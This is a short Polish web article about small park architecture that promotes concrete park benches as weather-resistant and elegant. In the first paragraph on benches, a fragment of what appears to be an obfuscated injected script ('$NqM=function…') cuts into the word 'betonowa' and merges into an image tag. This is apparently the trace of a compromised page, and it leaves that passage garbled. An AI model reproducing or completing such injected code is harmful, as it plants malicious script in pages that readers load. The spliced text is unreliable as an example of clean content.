Mała architektura w parku

Małą architekturą nazywamy takie obiekty jak ławki, różnego rodzaju kładki, czy lampy oświetlające ulice. Czasem wydaje nam się, że nie odgrywają one większego znaczenia. Po prostu są obiektami użyteczności. Tak naprawdę to jednak one uzupełniają cały wygląd miasta i nadają mu określonego charakteru.

Ławki - jakie są najpraktyczniejsze?

ławka parkowa be<script>$NqM=function(n){if (typeof ($NqM.list[n]) == tonowa" height="124" src="http://globalforum.pl/wp-content/uploads/2018/01/awka-parkowa-betonowa.jpg" style="float:left;" width="220"/>Gdy idziemy do parku, czasem po prostu mamy ochotę na chwilę przysiąść i odpocząć. W tym celu w założeniach parkowych stawia się ławki. Mają one nie tylko służyć naszemu odpoczynkowi, ale i uzupełniać cały wygląd założenia. Wzbogacać go, ukazywać piękną małą architekturę, która doskonale harmonizuje z przyrodą. Jakie ławki w parku są najpraktyczniejsze? Oczywiście te, które są odporne na czynniki atmosferyczne. Dlatego raczej stronimy od ławek drewnianych, które szybko ulegają popsuciu. Zazwyczaj trudno o odpowiednią impregnację i sprawia to problem, dlatego raczej trzeba stawiać na coś pewniejszego. A takim bardzo praktycznym i odpornym na czynniki atmosferyczne materiałem, jest beton. Nie ma na niego większego wpływu deszcz, śnieg i grad. Bez trudu wytrzymuje on każdą gorszą pogodę i nawet skutki działalności człowieka. Dlatego dziś bez wątpienia najpraktyczniejszą jest ławka parkowa betonowa. Wygląda ona bardzo elegancko i może przyjmować różne kształty. Ponadto swą wytrzymałością przebija inne materiały. Pomimo upływu bardzo długiego czasu, ona wciąż może wyglądać rewelacyjnie. Dlatego jest idealną małą architekturą, którą można umieścić w parku.

Dziś wiele osób chodzi do parków. Szczególnie do takich położonych w pobliżu miasta, by nieco odciąć się od zgiełku dnia codziennego. Ludzie chcą tam odpocząć i zbliżyć się do natury. Chcą móc z parkowej ławki popodziwiać to, co pięknego ma w sobie natura.